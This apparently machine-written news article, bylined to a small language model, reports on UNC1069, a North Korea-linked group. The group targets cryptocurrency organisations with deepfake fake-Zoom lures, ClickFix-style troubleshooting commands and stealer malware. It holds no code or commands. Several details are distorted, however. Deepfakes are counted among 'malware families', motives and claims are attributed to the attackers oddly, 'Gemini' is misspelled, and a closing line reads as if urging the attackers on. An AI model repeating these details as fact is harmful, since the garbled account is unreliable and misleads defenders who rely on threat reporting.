Ethical Hacking News
A North Korea-linked threat actor known as UNC1069 has been using artificial intelligence (AI) lures to attack cryptocurrency organizations, compromising Windows and macOS systems with the goal of facilitating financial theft. The group's use of AI-generated video, social engineering schemes, and malware families marks a significant expansion in their capabilities.
Researchers at Google Mandiant have been tracking a North Korea-linked threat actor known as UNC1069, which has been targeting cryptocurrency organizations using sophisticated social engineering tactics.UNC1069 has shifted from spear-phishing techniques to the Web3 industry, including centralized exchanges and software developers in financial institutions.The group uses AI-generated video, phishing schemes, and malware families to conduct its attacks.One of the latest attacks involved deploying seven unique malware families, including deepfakes and a backdoor called BIGMACHO.The attackers use Calendly to schedule meetings with victims and force them into watching fake Zoom meetings using clickjacking.The malware families deployed by UNC1069 include tools for gathering system information, distributing additional payloads, and stealing cryptocurrency credentials.The group's use of deepfakes and AI-generated content marks a new level of sophistication in its social engineering tactics.
In recent months, researchers at Google Mandiant have been tracking a North Korea-linked threat actor known as UNC1069, which has been observed targeting cryptocurrency organizations using sophisticated social engineering tactics. The group's use of AI-generated video, phishing schemes, and malware families marks a significant expansion in their capabilities.
According to the researchers, UNC1069 has been active since at least April 2018 and has a history of conducting social engineering campaigns for financial gain using fake meeting invites and posing as investors from reputable companies on Telegram. The group is also tracked by the broader cybersecurity community under the monikers CryptoCore and MASAN.
In November last year, Google Threat Intelligence Group (GTIG) published a report highlighting the threat actor's use of generative artificial intelligence (AI) tools like Gemini to produce lure material and other messaging related to cryptocurrency as part of efforts to support its social engineering campaigns. The group has also been observed attempting to misuse Gemmini to develop code to steal cryptocurrency, as well as leverage deepfake images and video lures mimicking individuals in the cryptocurrency industry in its campaigns to distribute a backdoor called BIGMACHO to victims by passing it off as a Zoom software development kit (SDK).
The researchers noted that since at least 2023, the group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds.
In the latest intrusion documented by Google's threat intelligence division, UNC1069 is said to have deployed as many as seven unique malware families, including several new malware families, such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH. The group's tactics involve approaching victims via Telegram by impersonating venture capitalists and, in a few cases, even using compromised accounts of legitimate entrepreneurs and startup founders.
Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting with the victim. Tired of waiting for responses, they use clickjacking to force the victim into watching a fake Zoom meeting interface that mirrors a real video call experience. They ask them to enable their camera and enter their name in order to participate in the meeting.
However, it's suspected that videos are either deepfakes or real recordings stealthily captured from other victims who had previously fallen prey to the same scheme. The attackers claim they are using the video replay to deceive other victims, making them believe they were participating in a genuine live call. When the video replay ends, the page smoothly transitions to showing that user's profile image, maintaining the illusion of a live call.
The attack proceeds to the next phase when the victim is shown a bogus error message about an audio issue, after which they are prompted to download and run a ClickFix-style troubleshooting command to address the problem. In the case of macOS, the commands lead to the delivery of an AppleScript that, in turn, drops a malicious Mach-O binary on the system.
The malware families deployed by UNC1069 include several C++ executables designed to gather system information and distribute additional payloads. A follow-on Golang backdoor component known as HIDDENCALL provides hands-on keyboard access to the compromised system, while a Swift-based data miner called DEEPBREATH is used to steal iCloud Keychain credentials and data from Google Chrome, Brave, and Microsoft Edge.
Another C++ downloader called SUGARLOADER is used to deploy CHROMEPUSH, which acts as a data stealer masquerading as a tool for editing Google Docs offline. This malware also comes with the ability to record keystrokes, observe username and password inputs, and extract browser cookies.
The group's use of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion in their capabilities. The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft.
"Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims," noted Kaspersky in an earlier incident. "When the video replay ended, the page smoothly transitioned to showing that user’s profile image, maintaining the illusion of a live call."
The use of deepfakes and AI-generated videos by UNC1069 marks a new level of sophistication in its social engineering tactics. The group's use of these tools makes it increasingly difficult for victims to distinguish between real and fake communications, making them more susceptible to falling prey to phishing schemes.
In light of this new threat, cybersecurity professionals and organizations must be on high alert for signs of UNC1069's activity. Companies that operate in the cryptocurrency space should take immediate action to patch vulnerabilities, implement robust security measures, and educate their employees about the tactics, techniques, and procedures (TTPs) used by this group.
The use of AI-generated content by threat actors like UNC1069 also highlights the need for organizations to develop more sophisticated tools and strategies to detect and mitigate these threats. In particular, the development of machine learning algorithms that can accurately identify and flag potential phishing attempts will be crucial in countering the use of deepfakes and AI-generated videos.
Ultimately, the success of threat actors like UNC1069 depends on their ability to adapt and evolve their tactics. As organizations become more sophisticated in their security measures, it is essential for these groups to develop new strategies that exploit human psychology and social vulnerabilities.
In conclusion, the recent attacks by UNC1069 demonstrate a significant expansion in the capabilities of North Korea-linked threat actors. The group's use of AI-generated content, deepfakes, and multiple malware families marks a new level of sophistication in its social engineering tactics. As the cryptocurrency space continues to evolve, it is essential for organizations to remain vigilant and proactive in countering these threats.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Korea-Linked-UNC1069-Uses-AI-Lures-to-Attack-Cryptocurrency-Organizations-ehn.shtml
Published: Wed Feb 11 01:18:35 2026 by llama3.2 3B Q4_K_M
